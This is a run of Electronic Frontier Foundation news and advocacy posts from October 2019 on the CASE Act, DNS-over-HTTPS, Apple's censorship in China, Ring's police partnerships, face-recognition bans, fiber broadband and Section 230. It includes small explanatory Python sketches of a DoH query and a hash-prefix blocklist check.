Electronic Frontier Foundation

The House Votes in Favor of Disastrous Copyright Bill

EFF - Tue, 10/22/2019 - 7:07pm
It’s Not Too Late: The Senate Can Still Stop the CASE Act

The House of Representatives has just voted in favor of the Copyright Alternative in Small-Claims Enforcement Act (CASE Act) by 410-6 (with 16 members not voting), moving forward a bill that Congress has had no hearings and no debates on so far this session. That means that there has been no public consideration of the serious harm the bill could do to regular Internet users and their expression online.

The CASE Act creates a new body in the Copyright Office which will receive copyright complaints, notify the person being sued, and then decide if money is owed and how much. This new Copyright Claims Board will be able to fine people up to $30,000 per proceeding. Worse, if you get one of these notices (maybe an email, maybe a letter—the law actually does not specify) and accidentally ignore it, you’re on the hook for the money with a very limited ability to appeal. $30,000 could bankrupt or otherwise ruin the lives of many Americans.

The CASE Act also makes harmful changes to copyright rules, would let sophisticated bad actors get away with trolling and infringement, and might even be unconstitutional. It fails to help the artists it’s supposed to serve and will put a lot of people at risk.

Even though the House has passed the CASE Act, we can still stop it in the Senate. Tell your Senators to vote “no” on the CASE Act.

Take Action

Tell the Senate not to bankrupt regular Internet users

EFF and Partners Urge U.S. Lawmakers to Support New DoH Protocol for a More Secure Internet

EFF - Tue, 10/22/2019 - 2:53pm
DoH Can Prevent Censorship and ISP Tracking by Encrypting Users’ Web Browsing

San Francisco—The Electronic Frontier Foundation (EFF) today called on Congress to support implementation of an Internet protocol that encrypts web traffic, a critical tool that will lead to dramatic improvements in user privacy and help impede the ability of governments to track and censor people.

EFF, joined by Consumer Reports and National Consumers League, said in a letter today to 12 members of Congress that the protocol, DNS-over-HTTPS (DoH), is a major step in enabling basic human rights—free speech and privacy—to become a natural and integral part of the Internet ecosystem.

“We see DoH as an important trend toward the use of encryption on the Internet—remedying a situation in which sensitive user data are exposed to an enormous range of eavesdroppers,” the letter says. It was sent to the chairs and ranking members of judiciary, homeland security, and science committees in the U.S. Senate and House of Representatives.

DoH is a next-generation privacy technology that enhances the security of the domain name system (DNS). When users type the name of a website in their browser, DNS looks up the numerical computer address of the site to facilitate the connection request. Without encryption, the content of the request, like your device’s IP address and the website you want to see, can be intercepted, read, or rerouted to fake sites.

DoH fixes those problems by encrypting DNS queries with TLS, the same protocol the majority of the world’s top websites already use to protect users’ requests from being read or modified. The encryption vastly increases security, preventing man-in-the-middle attacks, where a third party secretly intercepts web requests to alter them, steal log-in credentials, spy on the sender, or corrupt data.
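
For the technically curious, here is a minimal sketch of how a DoH client forms a query under RFC 8484: an ordinary DNS wire-format query is base64url-encoded (with padding stripped) and sent over HTTPS. The resolver hostname below is just an example, and the sketch only builds the URL rather than actually sending the request:

```python
import base64
import struct

def build_dns_query(hostname: str, qtype: int = 1) -> bytes:
    """Build a minimal DNS query in wire format (RFC 1035).
    qtype 1 = A record; class 1 = IN."""
    # Header: id=0 (RFC 8484 recommends 0 for cache friendliness),
    # flags=0x0100 (recursion desired), 1 question, 0 other records.
    header = struct.pack(">HHHHHH", 0, 0x0100, 1, 0, 0, 0)
    # Question name: each label is length-prefixed, terminated by a zero byte.
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in hostname.split(".")
    ) + b"\x00"
    question = qname + struct.pack(">HH", qtype, 1)
    return header + question

def doh_get_url(resolver: str, hostname: str) -> str:
    """Form an RFC 8484 DoH GET URL: the wire-format query is
    base64url-encoded with '=' padding stripped."""
    query = build_dns_query(hostname)
    encoded = base64.urlsafe_b64encode(query).rstrip(b"=").decode("ascii")
    return f"https://{resolver}/dns-query?dns={encoded}"

url = doh_get_url("cloudflare-dns.com", "www.eff.org")
print(url)
```

Because the whole exchange rides inside an ordinary HTTPS connection, an on-path observer sees only encrypted traffic to the resolver, not which domain name was looked up.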

“Countries like China and Turkey have used control over DNS to block their citizens’ access to websites and track the web activity of activists, a form of censorship that will eventually be much more difficult once there is widespread implementation of DoH,” said EFF Senior Legislative Counsel Ernesto Falcon.

Cable and telecom industry trade groups wrote to Congress last month voicing concerns that Google’s use of DoH raises data competition issues. Internet service providers are focused on protecting their ability to collect user data. Congress should instead listen to consumer and privacy groups calling for strong privacy protections that give users more control over their data, allow them to sue companies like Google for privacy violations, and preserve states’ rights to pass their own privacy rules.

Lawmakers should not oppose a long-overdue Internet upgrade that addresses consumer demand for better privacy and will make the Internet safer and more open in many parts of the world in dire need of that.

“This is a game-changer for Internet users around the world, and is crucial for human rights workers, activists, journalists, and dissidents whose online activities are under surveillance,” said EFF Engineering Director Max Hunter. “We hope to see Congress step up and fully support systemic deployment of DoH.”

Contact: Ernesto Falcon, Senior Legislative Counsel, ernesto@eff.org

Apple’s Split Brain: Building Levers for Improved Security or Content Censorship?

EFF - Tue, 10/22/2019 - 1:29pm

For many years, Chinese users of Apple devices have had a very different experience from non-Chinese users. Chinese users can’t type or see the Taiwanese flag emoji (which has even caused severe bugs in the past); iCloud backups and encryption keys for Chinese users are stored locally within China; content services like iTunes Movies and iBooks are either not available or asked to step carefully around damaging China’s image; and the “curated” App Store’s selection criteria are markedly different, forbidding tools like VPNs which are prevalent in the rest of the world.

As the Chinese mainland government and Hong Kong population struggle over the extent to which their shared “one country, two systems” is applied, these differences have started to show in the special administrative region too. Last week, as part of an iOS update, Apple extended the Taiwanese flag emoji ban to Hong Kong and Macau. Under pressure from the authorities, it has censored applications there as well, despite worldwide criticism. Apple’s recent expansion of content restrictions into Hong Kong is extremely concerning, especially since Apple’s strictly walled gardens give it nearly unilateral control over this content.

Because so much of its supply chain—not to mention a valuable consumer market—is tied to China, Apple seems particularly vulnerable to Chinese state pressure. But Apple’s ability to enforce these experiences—and users’ inability to evade them—comes from the locked-down design of Apple products. Systems built and sold on the basis of increasing the privacy and security of their end-users risk being turned against them, as the motives and interests of Apple the company shift away from that of Apple’s customers.

When Apple’s Crystal Prison is Filled By The Chinese State

Unlike Android users, iOS users can’t side-load applications without first jailbreaking their phones entirely. Apple’s closed application ecosystem enables it to enforce rules about application content and take apps down at any time.

This gives China a powerful hammer in the Apple ecosystem. In the second half of 2018 alone, Apple removed five hundred applications in mainland China to comply with local regulations. Greatfire’s AppleCensorship project detected over two thousand applications currently available in the U.S. that are not available in mainland China. Unavailable apps include censorship circumvention software like Tor and VPN apps, foreign software services like Google Earth, and news outlets like the New York Times. One of the most recent additions to this list is Quartz, which was removed following its reporting of the demonstrations in Hong Kong.

Apple’s policies for Hong Kong’s app store stood outside the heavy-handed rules of mainland censorship until recently, when Apple capitulated to state pressure to remove HKmap.live, a crowdsourced map application being used by protestors to track protest hotspots as well as events to avoid, like tear gas deployments and large gatherings of police. Because Apple’s App Store is the only app store for Apple devices, China can make this software effectively non-existent for Chinese, and now Hong Kongese, Apple users.

When “Safe Browsing” Can Feel Decidedly Unsafe

Researchers recently noticed a new clause in Safari’s Privacy & Security policies about sending some amount of browsing data to Chinese tech company Tencent to check whether a website is “fraudulent.” Apple has since confirmed that this works the same way as Google’s safe-browsing endpoint, and that Tencent is only consulted for devices with their region code set to mainland China.

Though only hash prefixes are sent, Tencent is still responsible for curating the blocklist, and has a history of conflating security-preserving measures with content censorship. Their QQ Browser, among other fundamental security and privacy flaws, uses a similar “security mechanism” to block website access on the client. On QQ Browser and many other Chinese browsing clients, the Github repository for a tech worker labor movement was blocked via the same mechanisms that are usually used to identify and block phishing sites. Thanks to widespread web encryption, and the fact that Github is too economically useful to China for the government to block entirely at the network level, browsers needed to resort to this workaround for client-side censorship of specific pages.
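
As a rough illustration of how these hash-prefix checks work, here is a simplified sketch (real implementations canonicalize URLs, hash many host/path expressions, and use the provider’s update protocol; all names and the example blocklist here are hypothetical). The key point is that whoever curates the blocklist decides which URLs trigger a check:

```python
import hashlib

PREFIX_LEN = 4  # Safe Browsing-style services commonly ship 4-byte prefixes

def url_hash(url: str) -> bytes:
    # A real client canonicalizes the URL first; this sketch
    # hashes the raw string directly.
    return hashlib.sha256(url.encode("utf-8")).digest()

def build_local_prefix_set(blocked_urls):
    """The provider ships only these short prefixes to clients,
    not the full blocklist."""
    return {url_hash(u)[:PREFIX_LEN] for u in blocked_urls}

def needs_server_check(url: str, prefix_set) -> bool:
    """True if the client must consult the provider about this URL.
    Only on a prefix match does hash data leave the device."""
    return url_hash(url)[:PREFIX_LEN] in prefix_set

# Hypothetical provider-curated blocklist:
blocklist = {"https://phish.example/login"}
prefixes = build_local_prefix_set(blocklist)
print(needs_server_check("https://phish.example/login", prefixes))  # True
print(needs_server_check("https://www.eff.org/", prefixes))
```

The privacy-preserving design (short prefixes locally, full check only on a match) is identical whether the curator blocks phishing pages or, as with the Github example above, pages someone wants censored; the mechanism cannot tell the difference.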

Apple Controls Its Ecosystem: But Who Controls Apple?

There’s some solace here that in Safari at least, we still have the option to turn this filtering off. But inserting content censorship or broader “public safety” interests into a narrow security mechanism is a dangerous road. As Apple commentator John Gruber points out, the very least that Apple owes its customers is proactive clarity and transparency when it farms out its huge responsibility to protect its users (and capabilities to control their experience) to third parties like Tencent.

Apple’s arguments for their strictly locked-down, DRM-laden garden include the stronger security and privacy standards it sets for applications by reviewing them. But by centralizing and monopolizing that power, it creates yet another powerful lever through which governments or other actors that have power over Apple can impose their control over these most personal of personal devices.

EFF to Amazon and Shaq: Stop Pushing Police Partnerships with Doorbell Camera Company

EFF - Tue, 10/22/2019 - 9:42am
EFF Urges Cancellation of Police Conference Event with Ring Spokesperson Shaquille O’Neal

Chicago – The Electronic Frontier Foundation (EFF) is urging Amazon, along with basketball legend Shaquille O’Neal, to cancel an event promoting Ring home-surveillance cameras at a police chiefs’ conference in Chicago later this month. EFF and many other civil liberties and privacy organizations are growing increasingly concerned about privacy-invasive partnerships between Ring and law enforcement agencies across the country, which threaten the privacy of all of us as we walk and drive around our communities.

Ring, a subsidiary of Amazon, sells networked cameras—often bundled with doorbells or lighting—that record video when they register movement and then send notifications to users’ cell phones. While Ring pitches the technology as a way to make your home safer, more than 500 police departments across the country have partnered with Ring to create an omnipresent surveillance system gathering video of people going about their lives.

The exact contours of these partnerships are unclear, thanks to restrictive contracts from Ring. However, in-depth reporting from various news outlets has shown a number of worrisome arrangements. For example, police that partner with Ring reportedly have access to Ring’s “Law Enforcement Neighborhood Portal,” which allows police to request footage from specific users. And once Ring footage ends up with police, it's considered evidence and out of Ring’s control—the video could be shared beyond your local law enforcement and you would likely never know. Amazon also encourages police to recommend that residents install the Ring app and purchase cameras for their homes.

“These partnerships expand the web of government surveillance of public places,” said EFF Policy Analyst Matthew Guariglia. “While crime is down in most parts of the country, Ring breeds paranoia, creating a feeling of crime everywhere. There’s too little consideration for the safety and privacy of those on the other end of the camera—unsuspecting dog-walkers, delivery people, and others. You should think twice about any technology that facilitates the proliferation of police surveillance on the streets where we protest, canvas for political candidates, and move freely every day.”

O’Neal has been a spokesperson and co-owner of Ring since 2016. At last year’s conference for the International Association of Chiefs of Police (IACP), Ring and O’Neal gave out tens of thousands of dollars in free Ring hardware to attendees, turning law enforcement officers into unofficial promoters for the technology. On October 27, O’Neal will host this year’s party at the IACP. Today, EFF has released a video imploring Ring and O’Neal to cancel the event and learn about the dangers of unaccountable surveillance.

“Ring’s law enforcement partnerships are endangering communities, encouraging an atmosphere of mistrust, and facilitating near-constant surveillance by local police,” said EFF Digital Strategist Jason Kelley. “We invite Shaq to talk to our experts instead of attending this ill-advised party.”

For more on Ring, Shaq, and surveillance:

Contact: Matthew Guariglia, Policy Analyst, matthew@eff.org; Jason Kelley, Digital Strategist, jason@eff.org

EFF Challenges Ring Spokesperson Shaq Over Privacy Concerns

EFF - Tue, 10/22/2019 - 1:32am

EFF is asking Ring spokesman Shaquille O’Neal to cancel his appearance at a party hosted by the company at the upcoming International Association of Chiefs of Police conference on October 27. Instead, we’re challenging Shaq to a one-on-one: not on the basketball court, but across the table, so we can discuss with him how the ubiquitous surveillance facilitated by Ring and its privacy-invasive partnerships with police can harm communities. 

Take Action 

Tell Shaq to Go One-on-one with EFF

Amazon and Ring have either ignored or dismissed the growing concerns among privacy experts, activists, and communities about the rapidly expanding number of partnerships between Ring and law enforcement. Two months ago, there were under 300; currently, the number has grown to well over 500.

(Embedded video: https://www.youtube.com/embed/r5VJwIFIsM8. Privacy info: this embed will serve content from youtube.com.)

EFF has decided to reach out to Shaq, who has been a co-owner and spokesperson for Ring since 2016, because of his interest in protecting communities and making them safer. Rather than join these IACP conventions, where Shaq hands out tens of thousands of dollars of Ring hardware to police officers from around the country, we’d like to offer the basketball legend a chance to talk to privacy experts about the damage these partnerships can do. 

Thanks to the partnerships with Ring, police only need to click a button to request hours of footage from dozens of cameras at a time. And, if a user refuses to share their footage with police, officers can bring a warrant to Amazon to get that footage. And once Ring footage ends up with police, it's considered evidence and out of the company's control—the obtained footage could be shared beyond your local law enforcement and you would likely never know.

In addition, these cameras pose risks to non-Ring users: every day, thousands of unsuspecting dog-walkers, delivery people, pedestrians, drivers, and others are being surveilled by Ring cameras, and by extension, Amazon, and—thanks to these partnerships—police. While the goal of the company appears to be community safety, there’s little consideration of the safety and privacy of those on the other end of the camera, who automatically become suspect thanks to this omnipresent camera network. The ease with which police can request access to this vast network of cameras can chill free movement, association, speech, and political expression in a neighborhood.

That’s why we’re turning to Shaq—and you. We’re asking for your help to tweet at Shaq and Ring and ask them to take these privacy concerns seriously. We’re hoping Shaq will sit down with us, one-on-one, and learn how these partnerships turn our neighborhoods into vast, unaccountable surveillance networks. These partnerships with Ring are #NothingButDragnet. 

Visit EFF.org/Ring to find out more, and to watch EFF’s on-court challenge to Shaq.

Ready to Pay $30,000 for Sharing a Photo Online? The House of Representatives Thinks You Are

EFF - Mon, 10/21/2019 - 8:10am

Tomorrow the House of Representatives is scheduled to vote on what appears to be an unconstitutional copyright bill that carries life-altering penalties. The bill would slap $30,000 fines on Internet users who share a copyrighted work they don’t own online.

Take Action

Now is the time to tell your Representative to vote NO

Supporters of the bill insist there’s no problem, because $30,000 isn’t that much money. They even laughed about it. We know the reality: when nearly half of this country would struggle to afford an emergency $400 expense, the penalties in this bill are deadly serious. What’s worse, they’ll be imposed not by an experienced judge, but instead by a committee of unaccountable bureaucrats.

What the CASE Act Does and Why it is a Disaster for Internet Users

The CASE Act creates a new tribunal separate from the federal judiciary (this is part of the constitutional problem) and places it within the Copyright Office. This agency has a sad history of industry capture, and often takes its cues from major content companies as opposed to average Americans. The new tribunals will receive complaints from rightsholders (anyone who has taken a photo or video, or written something) and will issue a “notice” to the party being sued.

We don’t actually know what this notice will look like. It could be an email, a text message, a phone call with voice mail, or a letter in the mail. Once the notice goes out, the targeted user has to respond within a tight deadline. Failing to respond in time means you’ll automatically lose, and are on the hook for $30,000. That’s why EFF is concerned that this law will easily be abused by copyright trolls. The trolls will cast a wide net, in hopes of catching Internet users unaware. Corporations with lawyers will be able to avoid all this, because they’ll have paid employees in charge of opting out of the CASE Act. But regular Americans with kids, jobs, and other real-life obligations could easily miss those notices, and lose out.

The CASE Act Radically Changes Copyright Law

One of the most disastrous changes to copyright law the bill creates is granting huge statutory damages to copyright owners who haven’t even registered their works. Under current law, if you copy a work that isn’t registered—meaning, the vast majority of things that are shared by users every single day—you’re only on the hook for the copyright owner’s actual economic loss. This is called “actual damages,” and very often, it’s $0. Under CASE, however, every copyrighted work will automatically be eligible for $30,000 in damages—whether or not the owner has bothered to register it.

Under current law, when I take a photo of my kids and someone shares it without my permission, the most I can sue them for is nearly always $0. The CASE Act is a radical departure from this sensible rule. If it passes, sharing most of what you see online—photos, videos, writings, and other works—means risking crippling liability.

If this upsets you and you want Congress to leave Internet users alone, then you have to contact your Representative and two Senators today, and tell them to vote NO on the CASE Act.

Take Action

Now is the time to tell your Representative to vote NO

Massachusetts: Tell Your Lawmakers to Press Pause on Government Face Surveillance

EFF - Thu, 10/17/2019 - 2:13pm

Face surveillance by government poses a threat to our privacy, chills protest in public places, and amplifies historical biases in our criminal justice system. Massachusetts has the opportunity to become the first state to stop government use of this troubling technology, from Provincetown to Pittsfield.

Massachusetts residents: tell your legislature to press pause on government use of face surveillance throughout the Commonwealth. Massachusetts bills S.1385 and H.1538 would place a moratorium on government use of the technology, and your lawmakers need to hear from you ahead of an Oct. 22 hearing on these bills.


Pause Government Face Surveillance in Massachusetts

Concern over government face surveillance in our communities is widespread. Polling from the ACLU of Massachusetts has found that more than three-quarters of residents (79 percent) support a statewide moratorium.

The city council of Somerville, Massachusetts voted unanimously in July to ban government face surveillance altogether, becoming the first community on the East Coast to do so. The town of Brookline, Massachusetts is currently considering a ban of its own. In California, the cities of San Francisco, Oakland—and just this week—Berkeley have passed bans as well.

EFF has advocated for governments to stop use of face surveillance in our communities immediately, particularly in light of what researchers at MIT’s Media Lab and others have found about its high error rates—particularly for women and people of color.

Even if it were possible to lessen these misidentification risks, however, government use of face recognition technology still poses grave threats to safety and privacy. Regardless of our race or gender, law enforcement use of face recognition technology poses a profound threat to personal privacy, political and religious expression, and the fundamental freedom to go about our lives without having our movements and associations covertly documented and analyzed.

Tell your lawmakers to support this bill and make sure that the people of Massachusetts have the opportunity to evaluate the consequences of using this technology before this type of mass surveillance becomes the norm in your communities.

Why Fiber is Vastly Superior to Cable and 5G

EFF - Wed, 10/16/2019 - 6:20pm

The United States, its states, and its local governments are in dire need of universal fiber plans. Major telecom carriers such as AT&T and Verizon have discontinued their fiber-to-the-home efforts, leaving most people facing expensive cable monopolies for the future. While much of the Internet infrastructure has already transitioned to fiber, a supermajority of households and businesses across the country still have slow and outdated connections. Transitioning the “last mile” into fiber will require a massive effort from industry and government—an effort the rest of the world has already started.

Unfortunately, the U.S. telecommunications industry’s arguments that 5G or existing DOCSIS cable infrastructure are more than up to the task of substituting for fiber have confused lawmakers, reporters, and regulators into believing we do not have a problem. In response, EFF recently completed extensive research into the existing options for last-mile broadband, laying out what the objective technical facts demonstrate. By every measurement, fiber connections to homes and businesses are, by far, the superior choice for the 21st century. It is not even close.

The Speed Chasm Between Fiber and Other Options

As a baseline, there is a divide between “wireline” internet (like cable and fiber) and “wireless” internet (like 5G). Cable systems can already deliver better service to most homes and businesses than 5G wireless deployments because the wireline service can carry signals farther with less interference than radio waves in the air. We’ve written about the difference between wireless and wireline internet technologies in the past. While 5G is a major improvement over previous generations of wireless broadband, cable internet will remain the better option for the vast majority of households in terms of both reliability and raw speed.

Gigabit and faster wireless networks have to rely on high-frequency spectrum in order to have sufficient bandwidth to deliver those speeds. But the faster the speed, and the higher the frequency, the more environmental factors such as weather or physical obstructions interfere with the transmission. Gigabit 5G uses “millimeter wave” frequencies, which can’t travel through doors or walls. In essence, the real-world environment adds so much friction to high-speed wireless transmissions that any contention that it can replace wireline fiber or cable—which, thanks to insulated wires, contend with few of those barriers—is suspect.
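
The “millimeter wave” name comes straight from the physics: wavelength is the speed of light divided by frequency. A quick sketch (28 GHz and 39 GHz are my assumption of commonly discussed gigabit 5G bands; 600 MHz stands in for low-band spectrum that penetrates buildings far better):

```python
C = 299_792_458  # speed of light in a vacuum, m/s

def wavelength_mm(freq_ghz: float) -> float:
    """Wavelength in millimeters for a given frequency in GHz."""
    return C / (freq_ghz * 1e9) * 1000

print(round(wavelength_mm(28), 1))   # ~10.7 mm: literally millimeter-scale
print(round(wavelength_mm(39), 1))
print(round(wavelength_mm(0.6), 1))  # 600 MHz low-band: roughly half a meter
```

Waves this short are easily absorbed or blocked by walls, foliage, and even rain, which is why gigabit 5G cells must be small and densely deployed.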

Meanwhile, fiber systems have at least a 10,000-fold (yes, ten thousand) advantage over cable systems in terms of raw bandwidth. This translates into a massive advantage in data capacity, and it’s why scientists have been able to squeeze more than 100 terabits per second (100,000 Gb/s) down a single fiber. The most advanced cable technology has achieved maximum speeds of around 10 Gb/s in a lab. Cable has not, and will not, come close to fiber. As we explain in our whitepaper, fiber also has significantly lower latency, fewer problems with dropped packets, and will be easier to upgrade in the future.

Incumbents Favor the Status Quo Because It’s Expensive for You and Profitable for Them

The American story of broadband deployment is a tragic one where your income level determines whether you have competition and affordable access. In the absence of national coverage policies, low-income Americans and rural Americans have been left behind. This stands to get worse absent a fundamental commitment to fiber for everyone. Our current situation and outlook for the future did not happen in a vacuum—policy decisions made more than a decade ago, at the advent of fiber deployment in the United States, have proven to be complete failures when it comes to universal access. EFF’s review of the history of those decisions in the early 2000s has shown that none of their rationales have been justified by what followed.

But it doesn’t have to be like this. There is absolutely no good reason we have to accept the current situation as the future. A fundamental refocus on competition, universality, and affordability by local, state, and the federal government is essential to get our house back in order. Policymakers doing anything short of that are effectively concluding that having slower, more expensive cable as your only choice for the gigabit future is an acceptable outcome. 

EFF Urges Congress Not to Dismantle Section 230

EFF - Wed, 10/16/2019 - 5:36pm
The Keys to a Healthy Internet Are User Empowerment and Competition, Not Censorship

The House Energy and Commerce Committee held a legislative hearing today over what to do with one of the most important Internet laws, Section 230. Members of Congress and the testifying panelists discussed many of the critical issues facing online activity like how Internet companies moderate their users’ speech, how Internet companies and law enforcement agencies are addressing online criminal activity, and how the law impacts competition. 

EFF Legal Director Corynne McSherry testified at the hearing, offering a strong defense of the law that’s helped create the Internet we all rely on today. In her opening statement, McSherry urged Congress not to take Section 230’s role in building the modern Internet lightly:

We all want an Internet where we are free to meet, create, organize, share, debate, and learn. We want to have control over our online experience and to feel empowered by the tools we use. We want our elections free from manipulation and for women and marginalized communities to be able to speak openly about their experiences.

Chipping away at the legal foundations of the Internet in order to pressure platforms to play the role of Internet police is not the way to accomplish those goals. 

(Embedded video: https://www.c-span.org/video/standalone/?c4822786/corynne-mcsherry-section-230. Privacy info: this embed will serve content from c-span.org.)

Recognizing the gravity of the challenges presented, Ranking Member Cathy McMorris Rodgers (R-WA) aptly stated: “I want to be very clear: I’m not for gutting Section 230. It’s essential for consumers and entities in the Internet ecosystem. Misguided and hasty attempts to amend or even repeal Section 230 for bias or other reasons could have unintended consequences for free speech and the ability for small businesses to provide new and innovative services.” 

We agree. Any change to Section 230 risks upsetting the balance Congress struck decades ago that created the Internet as it exists today. It protects users and Internet companies big and small, and leaves open the door to future innovation. As Congress continues to debate Section 230, here are some suggestions and concerns we have for lawmakers willing to grapple with the complexities and get this right.

Facing Illegal Activity Online: Focus on the Perpetrators

Much of the hearing focused on illegal speech and activity online. Representatives and panelists mentioned examples like illegal drug sales, wildlife sales, and fraud. But there’s an important distinction to make between holding Internet intermediaries, such as social media companies and classified ads sites, liable for what their users say or do online, and holding users themselves accountable for their behavior.

Section 230 has always had a federal criminal law carve out. This means that truly culpable online platforms can already be prosecuted in federal court, alongside their users, for illegal speech and activity. For example, a federal judge in the Silk Road case correctly ruled that Section 230 did not provide immunity against federal prosecution to the operator of a website that hosted other people’s ads for illegal drugs.

But EFF does not believe prosecuting Internet intermediaries is the best answer to the problems we find online. Rather, both federal and state government entities should allocate sufficient resources to target the direct perpetrators of illegal online behavior; that is, the users themselves who take advantage of open platforms to violate the law. Section 230 does not provide an impediment to going after these bad actors. McSherry pointed this out in her written testimony: “In the infamous Grindr case... the abuser was arrested two years ago under criminal charges of stalking, criminal impersonation, making a false police report, and disobeying a court order.”

Weakening Section 230 protections in order to expand the liability of online platforms for what their users say or do would incentivize companies to over-censor user speech in an effort to limit the companies’ legal exposure. Not only would this be harmful for legitimate user speech, it would also detract from law enforcement efforts to target the direct perpetrators of illegal behavior. As McSherry noted regarding the Allow States and Victims to Fight Online Sex Trafficking Act (FOSTA):

At this committee’s hearing on November 30, 2017, Tennessee Bureau of Investigation special agent Russ Winkler explained that online platforms were the most important tool in his arsenal for catching sex traffickers. One year later, there is anecdotal evidence that FOSTA has made it harder for law enforcement to find traffickers. Indeed, several law enforcement agencies report that without these platforms, their work finding and arresting traffickers has hit a wall.

Speech Moderation: User Choice and Empowerment

In her testimony, McSherry stressed that the Internet is a better place for online community when numerous platforms are available with a multitude of moderation philosophies. Section 230 has contributed to this environment by giving platforms the freedom to moderate speech the way they see fit.

The freedom that Section 230 afforded to Internet startups to choose their own moderation strategies has led to a multiplicity of options for users—some more restrictive and sanitized, some more laissez-faire. That mix of moderation philosophies contributes to a healthy environment for free expression and association online.

Reddit’s Steve Huffman echoed McSherry’s defense of Section 230 (PDF), noting that its protections have enabled the company to improve on its moderation practices over the years. He explained that the company’s speech moderation philosophy is one that prioritizes users making decisions about how they’d like to govern themselves:

The way Reddit handles content moderation today is unique in the industry. We use a governance model akin to our own democracy—where everyone follows a set of rules, has the ability to vote and self-organize, and ultimately shares some responsibility for how the platform works.

In an environment where platforms have their own approaches to content moderation, users have the ultimate power to decide which ones to use. McSherry noted in her testimony that while Grindr was not held liable for the actions of one user, that doesn’t mean that Grindr didn’t suffer. Grindr lost users, as they moved to other dating platforms. One reason why it’s essential that Congress protect Section 230 is to preserve the multitude of platform options.

Later in the hearing, Rep. Darren Soto (D-FL) asked each of the panelists who should be “the cop on the beat” in patrolling online speech. McSherry reiterated that users themselves should be empowered to decide what material they see online: “A cardinal principle for us at EFF is that at the end of the day, users should be able to control their Internet experience, and we need to have many more tools to make that possible.”

If some critics of Section 230 get their way, users won’t have that power. Prof. Danielle Citron offered a proposal (PDF) that Congress implement a “duty of care” regime, under which platforms would be required to show that they’re meeting a legal “reasonableness” standard in their moderation practices in order to keep their Section 230 protection. She proposes that courts look at what platforms do generally to moderate content and whether their policies are reasonable, rather than what a company did with respect to a particular piece of user content.

But inviting courts to determine what moderation practices are best would effectively do away with Section 230’s protections, disempowering users in the process. In McSherry’s words, “As a litigator, [a reasonableness standard] is terrifying. That means a lot of litigation risk, as courts try to figure out what counts as reasonable.”

Robots Won’t Fix It

There was plenty of agreement that current moderation is flawed, but much disagreement about why. Subject-matter experts on the panel frequently described areas of moderation outside their own purview as working perfectly fine, and questioned why those techniques could not be applied elsewhere.

In one disorienting moment, Gretchen Peters of the Alliance to Counter Crime Online asked the congressional committee when they’d last seen a “dick pic” on Facebook, and took their silence as an indication that Facebook had solved the dick pic problem. She then suggested Facebook could move on to scanning for other criminality. Professor Hany Farid, an expert in at-scale, resilient hashing of child exploitative imagery, wondered why the tech companies could not create digital fingerprinting solutions for opioid sales.

Many cited Big Tech’s work to automatically remove what they believe to be copyright-infringing material as a potential model for other areas—perhaps unaware that the continuing failure of copyright bots is one of the few areas where EFF and the entertainment industry agree (though we think the bots take down too much entirely lawful material, and Hollywood thinks they’re not draconian enough).

The truth is that the deeper you look at current moderation—and listen carefully to those directly silenced by algorithmic solutions—the more you understand that robots won’t fix it. Robots are still terrible at understanding context, which has resulted in everything from Tumblr flagging pictures of bowls of fruit as “adult content” to YouTube removing possible evidence of war crimes because it categorized the videos as “terrorist content.” Representative Lisa Blunt Rochester (D-DE) pointed out the consequences of having algorithms police speech: “Groups already facing prejudice and discrimination will be further marginalized and censored.” Much of the demand for Big Tech to do more moderation is predicated on the idea that the companies are good at it, with their magical tech tools. As our own testimony and long experience show, they’re really not—with bots or without.

Could they do better? Perhaps, but as Reddit’s Huffman noted, doing so means that the tech companies need to be able to innovate without having those attempts result in a hail of lawsuits. That is, he said, “exactly the sort of ability that 230 gives us.”

Reforming 230 with Big Tech as the Focus Would Harm Small Internet Companies

Critics of 230 often fail to acknowledge that many of the solutions they seek are not within reach of startups and smaller companies. Techniques like preemptive blocking of content, persistent policing of user posts, and mechanisms that analyze speech in real time to see what needs to be censored are extremely expensive.

That means that controlling what users do, at scale, will only be doable by Big Tech. It’s not only cost-prohibitive for smaller companies; getting it wrong also carries a high cost in liability. For example, Google’s Content ID, often held up in the copyright context as one means of enforcement, required a $100 million investment by Google to develop and deploy—and it still does a bad job.

Google’s Katherine Oyama testified that Google already employs around 10,000 people who work on content moderation—a bar that no startup could meet—but even that appears insufficient to some critics. By comparison, Wikipedia, the largest repository of information in human history, employs only about 350 staff for its entire operation and relies heavily on volunteers.

A set of rules that would require a Google-sized company to expend even more resources means that only the most well-funded firms could maintain global platforms. A minimally-staffed nonprofit like Wikipedia could not continue to operate as it does today. The Internet would become more concentrated, and further removed from the promise of a network that empowers everyone.

As Congress continues to examine the problems facing the Internet today, we hope lawmakers remember the role that Section 230 plays in defending the Internet’s status as a place for free speech and community online. We fear that undermining Section 230 would harden today’s largest tech companies from future competition. Most importantly, we hope lawmakers listen to the voices of the people they risk pushing offline.

Read McSherry’s full written testimony.

Victory! Berkeley City Council Unanimously Votes to Ban Face Recognition

EFF - Wed, 10/16/2019 - 4:46pm

Berkeley has become the third city in California and the fourth city in the United States to ban the use of face recognition technology by the government. After an outpouring of support from the community, the Berkeley City Council voted unanimously to adopt the ordinance introduced by Councilmember Kate Harrison earlier this year.

Berkeley joins other Bay Area cities, including San Francisco and Oakland, which also banned government use of face recognition. In July 2019, Somerville, Massachusetts became the first city on the East Coast to ban the government’s use of face recognition.

The passage of the ordinance also follows the signing of A.B. 1215, a California state law that places a three-year moratorium on police use of face recognition on body-worn cameras, beginning on January 1, 2020. As EFF’s Associate Director of Community Organizing Nathan Sheard told the California Assembly, using face recognition technology “in connection with police body cameras would force Californians to decide between actively avoiding interaction and cooperation with law enforcement, or having their images collected, analyzed, and stored as perpetual candidates for suspicion.”

Over the last several years, EFF has continually voiced concerns over the First and Fourth Amendment implications of government use of face surveillance. These concerns are exacerbated by research conducted by MIT’s Media Lab regarding the technology’s high error rates for women and people of color. However, even if manufacturers are successful in addressing the technology’s substantially higher error rates for already marginalized communities, government use of face recognition technology will still threaten safety and privacy, chill free speech, and amplify historical and ongoing discrimination in our criminal justice system.

Berkeley’s ban on face recognition is an important step toward curtailing the government’s use of biometric surveillance. Congratulations to the community that stood up in opposition to this invasive and flawed technology and to the city council members who listened.

¿Quién Defiende Tus Datos?: Four Years Setting The Bar for Privacy Protections in Latin America and Spain

EFF - Wed, 10/16/2019 - 11:22am

